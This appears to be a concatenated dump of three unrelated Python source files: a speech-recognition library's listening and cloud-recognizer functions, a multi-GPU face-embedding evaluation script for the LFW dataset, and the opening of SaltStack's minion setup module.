The ``timeout`` parameter is the maximum number of seconds that it will wait for a phrase to start before giving up and throwing an ``speech_recognition.WaitTimeoutError`` exception. If ``timeout`` is ``None``, it will wait indefinitely.
"""
assert isinstance(source, AudioSource), "Source must be an audio source"
assert source.stream is not None, "Audio source must be entered before listening, see documentation for `AudioSource`; are you using `source` outside of a `with` statement?"
assert self.pause_threshold >= self.non_speaking_duration >= 0
seconds_per_buffer = (source.CHUNK + 0.0) / source.SAMPLE_RATE
pause_buffer_count = int(math.ceil(self.pause_threshold / seconds_per_buffer)) # number of buffers of non-speaking audio before the phrase is complete
phrase_buffer_count = int(math.ceil(self.phrase_threshold / seconds_per_buffer)) # minimum number of buffers of speaking audio before we consider the speaking audio a phrase
non_speaking_buffer_count = int(math.ceil(self.non_speaking_duration / seconds_per_buffer)) # maximum number of buffers of non-speaking audio to retain before and after
# read audio input for phrases until there is a phrase that is long enough
elapsed_time = 0 # number of seconds of audio read
while True:
frames = collections.deque()
# store audio input until the phrase starts
while True:
elapsed_time += seconds_per_buffer
if timeout and elapsed_time > timeout: # handle timeout if specified
raise TimeoutError("listening timed out")
buffer = source.stream.read(source.CHUNK)
if len(buffer) == 0: break # reached end of the stream
frames.append(buffer)
if len(frames) > non_speaking_buffer_count: # ensure we only keep the needed amount of non-speaking buffers
frames.popleft()
# detect whether speaking has started on audio input
energy = audioop.rms(buffer, source.SAMPLE_WIDTH) # energy of the audio signal
if energy > self.energy_threshold: break
# dynamically adjust the energy threshold using assymmetric weighted average
if self.dynamic_energy_threshold:
damping = self.dynamic_energy_adjustment_damping ** seconds_per_buffer # account for different chunk sizes and rates
target_energy = energy * self.dynamic_energy_ratio
self.energy_threshold = self.energy_threshold * damping + target_energy * (1 - damping)
# read audio input until the phrase ends
pause_count, phrase_count = 0, 0
while True:
elapsed_time += seconds_per_buffer
buffer = source.stream.read(source.CHUNK)
if len(buffer) == 0: break # reached end of the stream
frames.append(buffer)
phrase_count += 1
# check if speaking has stopped for longer than the pause threshold on the audio input
energy = audioop.rms(buffer, source.SAMPLE_WIDTH) # energy of the audio signal
if energy > self.energy_threshold:
pause_count = 0
else:
pause_count += 1
if pause_count > pause_buffer_count: # end of the phrase
break
# check how long the detected phrase is, and retry listening if the phrase is too short
phrase_count -= pause_count
if phrase_count >= phrase_buffer_count: break # phrase is long enough, stop listening
# obtain frame data
for i in range(pause_count - non_speaking_buffer_count): frames.pop() # remove extra non-speaking frames at the end
frame_data = b"".join(list(frames))
return AudioData(frame_data, source.SAMPLE_RATE, source.SAMPLE_WIDTH)
def listen_in_background(self, source, callback):
"""
Spawns a thread to repeatedly record phrases from ``source`` (an ``AudioSource`` instance) into an ``AudioData`` instance and call ``callback`` with that ``AudioData`` instance as soon as each phrase are detected.
Returns a function object that, when called, requests that the background listener thread stop, and waits until it does before returning. The background thread is a daemon and will not stop the program from exiting if there are no other non-daemon threads.
Phrase recognition uses the exact same mechanism as ``recognizer_instance.listen(source)``.
The ``callback`` parameter is a function that should accept two parameters - the ``recognizer_instance``, and an ``AudioData`` instance representing the captured audio. Note that ``callback`` function will be called from a non-main thread.
"""
assert isinstance(source, AudioSource), "Source must be an audio source"
running = [True]
def threaded_listen():
with source as s:
while running[0]:
try: # listen for 1 second, then check again if the stop function has been called
audio = self.listen(s, 1)
except TimeoutError: # listening timed out, just try again
pass
else:
if running[0]: callback(self, audio)
def stopper():
running[0] = False
listener_thread.join() # block until the background thread is done, which can be up to 1 second
listener_thread = threading.Thread(target=threaded_listen)
listener_thread.daemon = True
listener_thread.start()
return stopper
def recognize_bing(self, audio_data, key, language = "en-US", show_all = False):
"""
Performs speech recognition on ``audio_data`` (an ``AudioData`` instance), using the Microsoft Bing Voice Recognition API.
The Microsoft Bing Voice Recognition API key is specified by ``key``. Unfortunately, these are not available without `signing up for an account <https://www.microsoft.com/cognitive-services/en-us/speech-api>`__ with Microsoft Cognitive Services.
To get the API key, go to the `Microsoft Cognitive Services subscriptions overview <https://www.microsoft.com/cognitive-services/en-us/subscriptions>`__, go to the entry titled "Speech", and look for the key under the "Keys" column. Microsoft Bing Voice Recognition API keys are 32-character lowercase hexadecimal strings.
The recognition language is determined by ``language``, an RFC5646 language tag like ``"en-US"`` (US English) or ``"fr-FR"`` (International French), defaulting to US English. A list of supported language values can be found in the `API documentation <https://www.microsoft.com/cognitive-services/en-us/speech-api/documentation/api-reference-rest/BingVoiceRecognition#user-content-4-supported-locales>`__.
Returns the most likely transcription if ``show_all`` is false (the default). Otherwise, returns the `raw API response <https://www.microsoft.com/cognitive-services/en-us/speech-api/documentation/api-reference-rest/BingVoiceRecognition#user-content-3-voice-recognition-responses>`__ as a JSON dictionary.
Raises a ``speech_recognition.UnknownValueError`` exception if the speech is unintelligible. Raises a ``speech_recognition.RequestError`` exception if the speech recognition operation failed, if the key isn't valid, or if there is no internet connection.
"""
try: # attempt to use the Python 2 modules
from urllib import urlencode
from urllib2 import Request, urlopen, URLError, HTTPError
except ImportError: # use the Python 3 modules
from urllib.parse import urlencode
from urllib.request import Request, urlopen
from urllib.error import URLError, HTTPError
assert isinstance(audio_data, AudioData), "Data must be audio data"
assert isinstance(key, str), "`key` must be a string"
assert isinstance(language, str), "`language` must be a string"
access_token, expire_time = getattr(self, "bing_cached_access_token", None), getattr(self, "bing_cached_access_token_expiry", None)
allow_caching = True
try:
from time import monotonic # we need monotonic time to avoid being affected by system clock changes, but this is only available in Python 3.3+
except ImportError:
try:
from monotonic import monotonic # use time.monotonic backport for Python 2 if available (from https://pypi.python.org/pypi/monotonic)
except (ImportError, RuntimeError):
expire_time = None # monotonic time not available, don't cache access tokens
allow_caching = False # don't allow caching, since monotonic time isn't available
if expire_time is None or monotonic() > expire_time: # caching not enabled, first credential request, or the access token from the previous one expired
# get an access token using OAuth
credential_url = "https://oxford-speech.cloudapp.net/token/issueToken"
credential_request = Request(credential_url, data = urlencode({
"grant_type": "client_credentials",
"client_id": "python",
"client_secret": key,
"scope": "https://speech.platform.bing.com"
}).encode("utf-8"))
if allow_caching:
start_time = monotonic()
try:
credential_response = urlopen(credential_request)
except HTTPError as e:
raise RequestError("recognition request failed: {0}".format(getattr(e, "reason", "status {0}".format(e.code)))) # use getattr to be compatible with Python 2.6
except URLError as e:
raise RequestError("recognition connection failed: {0}".format(e.reason))
credential_text = credential_response.read().decode("utf-8")
credentials = json.loads(credential_text)
access_token, expiry_seconds = credentials["access_token"], float(credentials["expires_in"])
if allow_caching:
# save the token for the duration it is valid for
self.bing_cached_access_token = access_token
self.bing_cached_access_token_expiry = start_time + expiry_seconds
wav_data = audio_data.get_wav_data(
convert_rate = 16000, # audio samples must be 8kHz or 16 kHz
convert_width = 2 # audio samples should be 16-bit
)
url = "https://speech.platform.bing.com/recognize/query?{0}".format(urlencode({
"version": "3.0",
"requestid": uuid.uuid4(),
"appID": "D4D52672-91D7-4C74-8AD8-42B1D98141A5",
"format": "json",
"locale": language,
"device.os": "wp7",
"scenarios": "ulm",
"instanceid": uuid.uuid4(),
"result.profanitymarkup": "0",
}))
request = Request(url, data = wav_data, headers = {
"Authorization": "Bearer {0}".format(access_token),
"Content-Type": "audio/wav; samplerate=16000; sourcerate={0}; trustsourcerate=true".format(audio_data.sample_rate),
})
try:
response = urlopen(request)
except HTTPError as e:
raise RequestError("recognition request failed: {0}".format(getattr(e, "reason", "status {0}".format(e.code)))) # use getattr to be compatible with Python 2.6
except URLError as e:
raise RequestError("recognition connection failed: {0}".format(e.reason))
response_text = response.read().decode("utf-8")
result = json.loads(response_text)
# return results
if show_all: return result
if "header" not in result or "lexical" not in result["header"]: raise UnknownValueError()
return result["header"]["lexical"]
def recognize_google(self,audio_data, key = None, language = "en-US", show_all = False):
"""
Performs speech recognition on ``audio_data`` (an ``AudioData`` instance), using the Google Speech Recognition API.
The Google Speech Recognition API key is specified by ``key``. If not specified, it uses a generic key that works out of the box. This should generally be used for personal or testing purposes only, as it **may be revoked by Google at any time**.
To obtain your own API key, simply following the steps on the `API Keys <http://www.chromium.org/developers/how-tos/api-keys>`__ page at the Chromium Developers site. In the Google Developers Console, Google Speech Recognition is listed as "Speech API".
The recognition language is determined by ``language``, an RFC5646 language tag like ``"en-US"`` (US English) or ``"fr-FR"`` (International French), defaulting to US English. A list of supported language values can be found in this `StackOverflow answer <http://stackoverflow.com/a/14302134>`__.
Returns the most likely transcription if ``show_all`` is false (the default). Otherwise, returns the raw API response as a JSON dictionary.
Raises a ``speech_recognition.UnknownValueError`` exception if the speech is unintelligible. Raises a ``speech_recognition.RequestError`` exception if the speech recognition operation failed, if the key isn't valid, or if there is no internet connection.
"""
try: # attempt to use the Python 2 modules
from urllib import urlencode
from urllib2 import Request, urlopen, URLError, HTTPError
except ImportError: # use the Python 3 modules
from urllib.parse import urlencode
from urllib.request import Request, urlopen
from urllib.error import URLError, HTTPError
assert isinstance(audio_data, AudioData), "`audio_data` must be audio data"
assert key is None or isinstance(key, str), "`key` must be `None` or a string"
assert isinstance(language, str), "`language` must be a string"
#module uses flac by default, which attempts to open a subprocess which fails on Heroku
#modified this function to use a wav file instead, which Google apparently supports
flac_data = audio_data.get_wav_data(
convert_rate = 16000, # audio samples must be at least 8 kHz
convert_width = 2 # audio samples must be 16-bit
)
#we're using the Google Chromium Speech APIv2 which has been deprecated in favor of the Google Cloud Speech API
#this API is meant for devs, and has a wonky process to enable which involves joining a Google Group
if key is None: key = "AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw"
url = "http://www.google.com/speech-api/v2/recognize?{0}".format(urlencode({
"client": "chromium",
"lang": language,
"key": key,
}))
#changed header parameters for wav file
request = Request(url, data = flac_data, headers = {"Content-Type": "audio/l16; rate=16000"})
# obtain audio transcription results
try:
response = urlopen(request)
except HTTPError as e:
raise RequestError("recognition request failed: {0}".format(getattr(e, "reason", "status {0}".format(e.code)))) # use getattr to be compatible with Python 2.6
except URLError as e:
raise RequestError("recognition connection failed: {0}".format(e.reason))
response_text = response.read().decode("utf-8")
#.
# ignore any blank blocks
actual_result = []
for line in response_text.split("\n"):
if not line: continue
result = json.loads(line)["result"]
if len(result) != 0:
actual_result = result[0]
break
# return results
if show_all: return actual_result
if "alternative" not in actual_result: raise UnknownValueError()
for entry in actual_result["alternative"]:
if "transcript" in entry:
return entry["transcript"]
raise UnknownValueError() # no transcriptions available
def recognize_wit(self, audio_data, key, show_all = False):
"""
Performs speech recognition on ``audio_data`` (an ``AudioData`` instance), using the Wit.ai API.
The Wit.ai API key is specified by ``key``. Unfortunately, these are not available without `signing up for an account <https://wit.ai/>`__ and creating an app. You will need to add at least one intent to the app before you can see the API key, though the actual intent settings don't matter.
To get the API key for a Wit.ai app, go to the app's overview page, go to the section titled "Make an API request", and look for something along the lines of ``Authorization: Bearer XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX``; ``XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX`` is the API key. Wit.ai API keys are 32-character uppercase alphanumeric strings.
The recognition language is configured in the Wit.ai app settings.
Returns the most likely transcription if ``show_all`` is false (the default). Otherwise, returns the `raw API response <https://wit.ai/docs/http/20141022#get-intent-via-text-link>`__ as a JSON dictionary.
Raises a ``speech_recognition.UnknownValueError`` exception if the speech is unintelligible. Raises a ``speech_recognition.RequestError`` exception if the speech recognition operation failed, if the key isn't valid, or if there is no internet connection.
"""
try: # attempt to use the Python 2 modules
from urllib import urlencode
from urllib2 import Request, urlopen, URLError, HTTPError
except ImportError: # use the Python 3 modules
from urllib.parse import urlencode
from urllib.request import Request, urlopen
from urllib.error import URLError, HTTPError
assert isinstance(audio_data, AudioData), "Data must be audio data"
assert isinstance(key, str), "`key` must be a string"
wav_data = audio_data.get_wav_data(
convert_rate = None if audio_data.sample_rate >= 8000 else 8000, # audio samples must be at least 8 kHz
convert_width = 2 # audio samples should be 16-bit
)
url = "https://api.wit.ai/speech?v=20141022"
request = Request(url, data = wav_data, headers = {"Authorization": "Bearer {0}".format(key), "Content-Type": "audio/wav"})
try:
response = urlopen(request)
except HTTPError as e:
raise RequestError("recognition request failed: {0}".format(getattr(e, "reason", "status {0}".format(e.code)))) # use getattr to be compatible with Python 2.6
except URLError as e:
raise RequestError("recognition connection failed: {0}".format(e.reason))
response_text = response.read().decode("utf-8")
result = json.loads(response_text)
# return results
if show_all: return result
if "_text" not in result or result["_text"] is None: raise UnknownValueError()
return result["_text"]
|
lfw_eval.py
|
import multiprocessing as mp
import os
import pickle
import queue
from multiprocessing import Process
from multiprocessing import Process
import cv2 as cv
import dlib
import numpy as np
from keras.applications.inception_resnet_v2 import preprocess_input
from tqdm import tqdm
from config import lfw_folder, img_size, channel, threshold, predictor_path
from utils import get_lfw_images, get_lfw_pairs, get_best_model
class InferenceWorker(Process):
def __init__(self, gpuid, in_queue, out_queue, signal_queue):
Process.__init__(self, name='ImageProcessor')
self.gpuid = gpuid
self.in_queue = in_queue
self.out_queue = out_queue
self.signal_queue = signal_queue
self.detector = dlib.get_frontal_face_detector()
self.sp = dlib.shape_predictor(predictor_path)
def run(self):
# set enviornment
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = str(self.gpuid)
print("InferenceWorker init, GPU ID: {}".format(self.gpuid))
from model import build_model
# load models
model = build_model()
model.load_weights(get_best_model())
while True:
try:
sample = {}
try:
sample['a'] = self.in_queue.get(block=False)
sample['p'] = self.in_queue.get(block=False)
sample['n'] = self.in_queue.get(block=False)
except queue.Empty:
break
batch_inputs = np.empty((3, 1, img_size, img_size, channel), dtype=np.float32)
for j, role in enumerate(['a', 'p', 'n']):
image_name = sample[role]
filename = os.path.join(lfw_folder, image_name)
image = cv.imread(filename)
image = image[:, :, ::-1] # RGB
dets = self.detector(image, 1)
num_faces = len(dets)
if num_faces > 0:
# Find the 5 face landmarks we need to do the alignment.
faces = dlib.full_object_detections()
for detection in dets:
faces.append(self.sp(image, detection))
image = dlib.get_face_chip(image, faces[0], size=img_size)
else:
image = cv.resize(image, (img_size, img_size), cv.INTER_CUBIC)
batch_inputs[j, 0] = preprocess_input(image)
y_pred = model.predict([batch_inputs[0], batch_inputs[1], batch_inputs[2]])
a = y_pred[0, 0:128]
p = y_pred[0, 128:256]
n = y_pred[0, 256:384]
self.out_queue.put({'image_name': sample['a'], 'embedding': a})
self.out_queue.put({'image_name': sample['p'], 'embedding': p})
self.out_queue.put({'image_name': sample['n'], 'embedding': n})
self.signal_queue.put(SENTINEL)
if self.in_queue.qsize() == 0:
break
except Exception as e:
print(e)
import keras.backend as K
K.clear_session()
print('InferenceWorker done, GPU ID {}'.format(self.gpuid))
class Scheduler:
def __init__(self, gpuids, signal_queue):
self.signal_queue = signal_queue
manager = mp.Manager()
self.in_queue = manager.Queue()
self.out_queue = manager.Queue()
self._gpuids = gpuids
self.__init_workers()
def __init_workers(self):
self._workers = list()
for gpuid in self._gpuids:
self._workers.append(InferenceWorker(gpuid, self.in_queue, self.out_queue, self.signal_queue))
def start(self, names):
# put all of image names into queue
for name in names:
self.in_queue.put(name)
# start the workers
for worker in self._workers:
worker.start()
# wait all fo workers finish
for worker in self._workers:
worker.join()
print("all of workers have been done")
return self.out_queue
def run(gpuids, q):
# scan all files under img_path
names = get_lfw_images()
# init scheduler
x = Scheduler(gpuids, q)
# start processing and wait for complete
return x.start(names)
SENTINEL = 1
def listener(q):
pbar = tqdm(total=13233 // 3)
for item in iter(q.get, None):
pbar.update()
def create_lfw_embeddings():
gpuids = ['0', '1', '2', '3']
print(gpuids)
manager = mp.Manager()
q = manager.Queue()
proc = mp.Process(target=listener, args=(q,))
proc.start()
out_queue = run(gpuids, q)
out_list = []
while out_queue.qsize() > 0:
out_list.append(out_queue.get())
with open("data/lfw_embeddings.p", "wb") as file:
pickle.dump(out_list, file)
q.put(None)
proc.join()
if __name__ == "__main__":
print('creating lfw embeddings')
create_lfw_embeddings()
with open('data/lfw_embeddings.p', 'rb') as file:
embeddings = pickle.load(file)
pairs = get_lfw_pairs()
y_true_list = []
y_pred_list = []
print('evaluating lfw database')
for pair in tqdm(pairs):
image_name_1 = pair['image_name_1']
image_name_2 = pair['image_name_2']
y_true = pair['same_person']
y_true_list.append(y_true)
embedding_1 = np.array([x['embedding'] for x in embeddings if x['image_name'] == image_name_1][0])
embedding_2 = np.array([x['embedding'] for x in embeddings if x['image_name'] == image_name_2][0])
dist = np.square(np.linalg.norm(embedding_1 - embedding_2))
y_pred = dist <= threshold
y_pred_list.append(y_pred)
y = np.array(y_true_list).astype(np.int32)
pred = np.array(y_pred_list).astype(np.int32)
from sklearn import metrics
print(y)
print(pred)
fpr, tpr, thresholds = metrics.roc_curve(y, pred)
print('showing lfw accuracy: ' + str(metrics.auc(fpr, tpr)))
|
minion.py
|
# -*- coding: utf-8 -*-
'''
Routines to set up a minion
'''
# Import python libs
from __future__ import absolute_import, print_function, with_statement, unicode_literals
import functools
import os
import sys
import copy
import time
import types
import signal
import random
import logging
import threading
import traceback
import contextlib
import multiprocessing
from random import randint, shuffle
from stat import S_IMODE
import salt.serializers.msgpack
from binascii import crc32
# Import Salt Libs
# pylint: disable=import-error,no-name-in-module,redefined-builtin
from salt.ext import six
from salt.ext.six.moves import range
from salt.utils.zeromq import zmq, ZMQDefaultLoop, install_zmq, ZMQ_VERSION_INFO
import salt.defaults.exitcodes
from salt.utils.ctx import RequestContext
# pylint: enable=no-name-in-module,redefined-builtin
import tornado
HAS_PSUTIL = False
try:
import salt.utils.psutil_compat as psutil
HAS_PSUTIL = True
except ImportError:
pass
HAS_RESOURCE = False
try:
import resource
HAS_RESOURCE = True
except ImportError:
pass
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
try:
import salt.utils.win_functions
HAS_WIN_FUNCTIONS = True
except ImportError:
HAS_WIN_FUNCTIONS = False
# pylint: enable=import-error
# Import salt libs
import salt
import salt.client
import salt.crypt
import salt.loader
import salt.beacons
import salt.engines
import salt.payload
import salt.pillar
import salt.syspaths
import salt.utils.args
import salt.utils.context
import salt.utils.data
import salt.utils.error
import salt.utils.event
import salt.utils.files
import salt.utils.jid
import salt.utils.minion
import salt.utils.minions
import salt.utils.network
import salt.utils.platform
import salt.utils.process
import salt.utils.schedule
import salt.utils.ssdp
import salt.utils.user
import salt.utils.zeromq
import salt.defaults.exitcodes
import salt.cli.daemons
import salt.log.setup
import salt.utils.dictupdate
from salt.config import DEFAULT_MINION_OPTS
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.utils.debug import enable_sigusr1_handler
from salt.utils.event import tagify
from salt.utils.odict import OrderedDict
from salt.utils.process import (default_signals,
SignalHandlingMultiprocessingProcess,
ProcessManager)
from salt.exceptions import (
CommandExecutionError,
CommandNotFoundError,
SaltInvocationError,
SaltReqTimeoutError,
SaltClientError,
SaltSystemExit,
SaltDaemonNotRunning,
SaltException,
SaltMasterUnresolvableError
)
import tornado.gen # pylint: disable=F0401
import tornado.ioloop # pylint: disable=F0401
log = logging.getLogger(__name__)
# To set up a minion:
# 1. Read in the configuration
# 2. Generate the function mapping dict
# 3. Authenticate with the master
# 4. Store the AES key
# 5. Connect to the publisher
# 6. Handle publications
def resolve_dns(opts, fallback=True):
'''
Resolves the master_ip and master_uri options
'''
ret = {}
check_dns = True
if (opts.get('file_client', 'remote') == 'local' and
not opts.get('use_master_when_local', False)):
check_dns = False
# Since salt.log is imported below, salt.utils.network needs to be imported here as well
import salt.utils.network
if check_dns is True:
try:
if opts['master'] == '':
raise SaltSystemExit
ret['master_ip'] = salt.utils.network.dns_check(
opts['master'],
int(opts['master_port']),
True,
opts['ipv6'],
attempt_connect=False)
except SaltClientError:
retry_dns_count = opts.get('retry_dns_count', None)
if opts['retry_dns']:
while True:
if retry_dns_count is not None:
if retry_dns_count == 0:
raise SaltMasterUnresolvableError
retry_dns_count -= 1
import salt.log
msg = ('Master hostname: \'{0}\' not found or not responsive. '
'Retrying in {1} seconds').format(opts['master'], opts['retry_dns'])
if salt.log.setup.is_console_configured():
log.error(msg)
else:
print('WARNING: {0}'.format(msg))
time.sleep(opts['retry_dns'])
try:
ret['master_ip'] = salt.utils.network.dns_check(
opts['master'],
int(opts['master_port']),
True,
opts['ipv6'],
attempt_connect=False)
break
except SaltClientError:
pass
else:
if fallback:
ret['master_ip'] = '127.0.0.1'
else:
raise
except SaltSystemExit:
unknown_str = 'unknown address'
master = opts.get('master', unknown_str)
if master == '':
master = unknown_str
if opts.get('__role') == 'syndic':
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. ' \
'Set \'syndic_master\' value in minion config.'.format(master)
else:
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. ' \
'Set \'master\' value in minion config.'.format(master)
log.error(err)
raise SaltSystemExit(code=42, msg=err)
else:
ret['master_ip'] = '127.0.0.1'
if 'master_ip' in ret and 'master_ip' in opts:
if ret['master_ip'] != opts['master_ip']:
log.warning(
'Master ip address changed from %s to %s',
opts['master_ip'], ret['master_ip']
)
if opts['source_interface_name']:
log.trace('Custom source interface required: %s', opts['source_interface_name'])
interfaces = salt.utils.network.interfaces()
log.trace('The following interfaces are available on this Minion:')
log.trace(interfaces)
if opts['source_interface_name'] in interfaces:
if interfaces[opts['source_interface_name']]['up']:
addrs = interfaces[opts['source_interface_name']]['inet'] if not opts['ipv6'] else\
interfaces[opts['source_interface_name']]['inet6']
ret['source_ip'] = addrs[0]['address']
log.debug('Using %s as source IP address', ret['source_ip'])
else:
log.warning('The interface %s is down so it cannot be used as source to connect to the Master',
opts['source_interface_name'])
else:
log.warning('%s is not a valid interface. Ignoring.', opts['source_interface_name'])
elif opts['source_address']:
ret['source_ip'] = salt.utils.network.dns_check(
opts['source_address'],
int(opts['source_ret_port']),
True,
opts['ipv6'],
attempt_connect=False)
log.debug('Using %s as source IP address', ret['source_ip'])
if opts['source_ret_port']:
ret['source_ret_port'] = int(opts['source_ret_port'])
log.debug('Using %d as source port for the ret server', ret['source_ret_port'])
if opts['source_publish_port']:
ret['source_publish_port'] = int(opts['source_publish_port'])
log.debug('Using %d as source port for the master pub', ret['source_publish_port'])
ret['master_uri'] = 'tcp://{ip}:{port}'.format(
ip=ret['master_ip'], port=opts['master_port'])
log.debug('Master URI: %s', ret['master_uri'])
return ret
def prep_ip_port(opts):
ret = {}
# Use given master IP if "ip_only" is set or if master_ip is an ipv6 address without
# a port specified. The is_ipv6 check returns False if brackets are used in the IP
# definition such as master: '[::1]:1234'.
if opts['master_uri_format'] == 'ip_only' or salt.utils.network.is_ipv6(opts['master']):
ret['master'] = opts['master']
else:
ip_port = opts['master'].rsplit(':', 1)
if len(ip_port) == 1:
# e.g. master: mysaltmaster
ret['master'] = ip_port[0]
else:
# e.g. master: localhost:1234
# e.g. master: 127.0.0.1:1234
# e.g. master: [::1]:1234
# Strip off brackets for ipv6 support
ret['master'] = ip_port[0].strip('[]')
# Cast port back to an int! Otherwise a TypeError is thrown
# on some of the socket calls elsewhere in the minion and utils code.
ret['master_port'] = int(ip_port[1])
return ret
def get_proc_dir(cachedir, **kwargs):
'''
Given the cache directory, return the directory that process data is
stored in, creating it if it doesn't exist.
The following optional Keyword Arguments are handled:
mode: which is anything os.makedir would accept as mode.
uid: the uid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
uid. Must be int. Works only on unix/unix like systems.
gid: the gid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
gid. Must be int. Works only on unix/unix like systems.
'''
fn_ = os.path.join(cachedir, 'proc')
mode = kwargs.pop('mode', None)
if mode is None:
mode = {}
else:
mode = {'mode': mode}
if not os.path.isdir(fn_):
# proc_dir is not present, create it with mode settings
os.makedirs(fn_, **mode)
d_stat = os.stat(fn_)
# if mode is not an empty dict then we have an explicit
# dir mode. So lets check if mode needs to be changed.
if mode:
mode_part = S_IMODE(d_stat.st_mode)
if mode_part != mode['mode']:
os.chmod(fn_, (d_stat.st_mode ^ mode_part) | mode['mode'])
if hasattr(os, 'chown'):
# only on unix/unix like systems
uid = kwargs.pop('uid', -1)
gid = kwargs.pop('gid', -1)
# if uid and gid are both -1 then go ahead with
# no changes at all
if (d_stat.st_uid != uid or d_stat.st_gid != gid) and \
[i for i in (uid, gid) if i != -1]:
os.chown(fn_, uid, gid)
return fn_
def load_args_and_kwargs(func, args, data=None, ignore_invalid=False):
'''
Detect the args and kwargs that need to be passed to a function call, and
check them against what was passed.
'''
argspec = salt.utils.args.get_function_argspec(func)
_args = []
_kwargs = {}
invalid_kwargs = []
for arg in args:
if isinstance(arg, dict) and arg.pop('__kwarg__', False) is True:
# if the arg is a dict with __kwarg__ == True, then its a kwarg
for key, val in six.iteritems(arg):
if argspec.keywords or key in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs[key] = val
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
else:
string_kwarg = salt.utils.args.parse_input([arg], condition=False)[1] # pylint: disable=W0632
if string_kwarg:
if argspec.keywords or next(six.iterkeys(string_kwarg)) in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs.update(string_kwarg)
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
for key, val in six.iteritems(string_kwarg):
invalid_kwargs.append('{0}={1}'.format(key, val))
else:
_args.append(arg)
if invalid_kwargs and not ignore_invalid:
salt.utils.args.invalid_kwargs(invalid_kwargs)
if argspec.keywords and isinstance(data, dict):
# this function accepts **kwargs, pack in the publish data
for key, val in six.iteritems(data):
_kwargs['__pub_{0}'.format(key)] = val
return _args, _kwargs
def eval_master_func(opts):
'''
Evaluate master function if master type is 'func'
and save it result in opts['master']
'''
if '__master_func_evaluated' not in opts:
# split module and function and try loading the module
mod_fun = opts['master']
mod, fun = mod_fun.split('.')
try:
master_mod = salt.loader.raw_mod(opts, mod, fun)
if not master_mod:
raise KeyError
# we take whatever the module returns as master address
opts['master'] = master_mod[mod_fun]()
# Check for valid types
if not isinstance(opts['master'], (six.string_types, list)):
raise TypeError
opts['__master_func_evaluated'] = True
except KeyError:
log.error('Failed to load module %s', mod_fun)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
except TypeError:
log.error('%s returned from %s is not a string', opts['master'], mod_fun)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
log.info('Evaluated master from module: %s', mod_fun)
def master_event(type, master=None):
'''
Centralized master event function which will return event type based on event_map
'''
event_map = {'connected': '__master_connected',
'disconnected': '__master_disconnected',
'failback': '__master_failback',
'alive': '__master_alive'}
if type == 'alive' and master is not None:
return '{0}_{1}'.format(event_map.get(type), master)
return event_map.get(type, None)
def service_name():
'''
Return the proper service name based on platform
'''
return 'salt_minion' if 'bsd' in sys.platform else 'salt-minion'
class MinionBase(object):
def __init__(self, opts):
self.opts = opts
@staticmethod
def process_schedule(minion, loop_interval):
try:
if hasattr(minion, 'schedule'):
minion.schedule.eval()
else:
log.error('Minion scheduler not initialized. Scheduled jobs will not be run.')
return
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if minion.schedule.loop_interval < loop_interval:
loop_interval = minion.schedule.loop_interval
log.debug(
'Overriding loop_interval because of scheduled jobs.'
)
except Exception as exc:
log.error('Exception %s occurred in scheduled job', exc)
return loop_interval
def process_beacons(self, functions):
'''
Evaluate all of the configured beacons, grab the config again in case
the pillar or grains changed
'''
if 'config.merge' in functions:
b_conf = functions['config.merge']('beacons', self.opts['beacons'], omit_opts=True)
if b_conf:
return self.beacons.process(b_conf, self.opts['grains']) # pylint: disable=no-member
return []
@tornado.gen.coroutine
def eval_master(self,
opts,
timeout=60,
safe=True,
failed=False,
failback=False):
'''
Evaluates and returns a tuple of the current master address and the pub_channel.
In standard mode, just creates a pub_channel with the given master address.
With master_type=func evaluates the current master address from the given
module and then creates a pub_channel.
With master_type=failover takes the list of masters and loops through them.
The first one that allows the minion to create a pub_channel is then
returned. If this function is called outside the minions initialization
phase (for example from the minions main event-loop when a master connection
loss was detected), 'failed' should be set to True. The current
(possibly failed) master will then be removed from the list of masters.
'''
# return early if we are not connecting to a master
if opts['master_type'] == 'disable':
log.warning('Master is set to disable, skipping connection')
self.connected = False
raise tornado.gen.Return((None, None))
# Run masters discovery over SSDP. This may modify the whole configuration,
# depending of the networking and sets of masters.
# if we are using multimaster, discovery can only happen at start time
# because MinionManager handles it. by eval_master time the minion doesn't
# know about other siblings currently running
if isinstance(self.opts['discovery'], dict) and not self.opts['discovery'].get('multimaster'):
self._discover_masters()
# check if master_type was altered from its default
if opts['master_type'] != 'str' and opts['__role'] != 'syndic':
# check for a valid keyword
if opts['master_type'] == 'func':
eval_master_func(opts)
# if failover or distributed is set, master has to be of type list
elif opts['master_type'] in ('failover', 'distributed'):
if isinstance(opts['master'], list):
log.info(
'Got list of available master addresses: %s',
opts['master']
)
if opts['master_type'] == 'distributed':
master_len = len(opts['master'])
if master_len > 1:
secondary_masters = opts['master'][1:]
master_idx = crc32(opts['id']) % master_len
try:
preferred_masters = opts['master']
preferred_masters[0] = opts['master'][master_idx]
preferred_masters[1:] = [m for m in opts['master'] if m != preferred_masters[0]]
opts['master'] = preferred_masters
log.info('Distributed to the master at \'{0}\'.'.format(opts['master'][0]))
except (KeyError, AttributeError, TypeError):
log.warning('Failed to distribute to a specific master.')
else:
log.warning('master_type = distributed needs more than 1 master.')
if opts['master_shuffle']:
log.warning(
'Use of \'master_shuffle\' detected. \'master_shuffle\' is deprecated in favor '
'of \'random_master\'. Please update your minion config file.'
)
opts['random_master'] = opts['master_shuffle']
opts['auth_tries'] = 0
